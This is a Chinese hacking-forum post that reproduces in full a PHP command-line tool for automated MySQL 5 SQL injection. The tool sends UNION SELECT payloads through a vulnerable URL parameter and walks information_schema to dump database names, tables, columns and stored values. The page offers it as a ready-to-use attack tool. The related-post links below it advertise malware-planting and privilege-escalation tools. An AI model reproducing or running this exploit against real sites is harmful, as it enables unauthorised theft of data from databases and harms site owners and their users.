|
[推荐]php+mysql 5 sql injection 暴取工具beta版
| 以下是引用片段: <?php error_reporting(7); echo "\tMysql ver 5 sql injection exploiter\n\n\t\tcoded by Mika[EST]\n\n"; if($argc>7 || $argc <2) { echo <<<INFO \t\t\tUsage:$argv[0] -t [table] [-f <field> -c [condition]]\n INFO; die; } //**************************************************************************** $url="http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8"; $db_name="vuldb"; //**************************************************************************** $curl=curl_init(); curl_setopt($curl,CURLOPT_HEADER,0); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080"); function find_value($url){ global $curl; //echo $url."\n"; curl_setopt($curl,CURLOPT_URL,$url); $content=curl_exec($curl); //echo $content; $re=preg_match("/(\|\|.+?\|\|)/i",$content,$result); //echo $content; if($re) { //return str_replace('||','',$result[1]); return $result[1]; } return 0; } function str2ascii($str){ $temp="char("; for($i=0;$i<strlen($str)-1;$i++){ //echo $str[$i]."\n"; $temp.=ord($str[$i]).','; } $temp.=ord($str[strlen($str)-1]).')'; //echo $temp."\n"; return $temp; } function exploit_db(){ global $url,$curl; $new_url=str_replace('MIKA_MIKA','concat(0x7C7C,SCHEMA_NAME,0x7C7C)',$url); $new_url.="%20from%20information_schema.SCHEMATA%20limit%20MIKA_MIKA,1/*"; $i=0; echo "DATABASES:\n"; do{ $new=str_replace('MIKA_MIKA',$i,$new_url); if($v1=find_value($new)) echo $v1."\n"; $i++; }while($v1); } function exploit_tab(){ global $url,$db_name,$curl; $new_url=str_replace('MIKA_MIKA','concat(0x7C7C,TABLE_NAME,0x7C7C)',$url); $new_url.="%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=".str2ascii($db_name)."%20limit%20MIKA_MIKA,1/*"; echo "Tables of database ".strtoupper($db_name)." :\n"; $i=0; do{ $new=str_replace('MIKA_MIKA',$i,$new_url); if($v1=find_value($new)) echo $v1."\n"; $i++; }while($v1); } function exploit_field(){ global $table_name,$url,$curl; $new_url=str_replace('MIKA_MIKA','concat(0x7C7C,COLUMN_NAME,0x7C7C)',$url); $new_url.="%20from%20information_schema.COLUMNS%20where%20TABLE_NAME=".str2ascii($table_name)."%20limit%20MIKA_MIKA,1/*"; $i=0; echo "columns of table ".strtoupper($table_name)." :\n"; do{ $new=str_replace('MIKA_MIKA',$i,$new_url); if($v1=find_value($new)) echo $v1."\n"; $i++; }while($v1); } function exploit_value($mode=0){ global $db_name,$table_name,$field_name,$condition,$url,$curl; $new_url=str_replace('MIKA_MIKA','concat(0x7C7C,MIKA_MIKA,0x7C7C)',$url); if($mode) { $new_url.="%20from%20$db_name.$table_name%20where%20$condition/*"; $new=str_replace('MIKA_MIKA',$field_name,$new_url); $v1=find_value($new); echo $v1."\n"; return; } $new_url.="%20from%20$db_name.$table_name%20limit%20MIKA_NUM,1/*"; $new_url=str_replace('MIKA_MIKA',$field_name,$new_url); $i=0; echo "$field_name values of table ".strtoupper($table_name)." :\n"; do{ $new=str_replace('MIKA_NUM',$i,$new_url); if($v1=find_value($new)) echo $v1."\n"; $i++; }while($v1); } switch($argc){ case 2: if($argv[1]=='-t') exploit_tab(); if($argv[1]=='-d') exploit_db(); break; case 3: $table_name=$argv[2]; exploit_field(); break; case 5: case 6: $table_name=$argv[2]; $field_name=$argv[4]; exploit_value(); break; case 7: $table_name=$argv[2]; $field_name=$argv[4]; $condition=$argv[6]; exploit_value(1); break; } ?> |
| 以下是引用片段: $url="http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8"; |
| 强悍挂马工具:IIS_AD IIS扩展(附 | 05-04 |
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |
您现在的位置: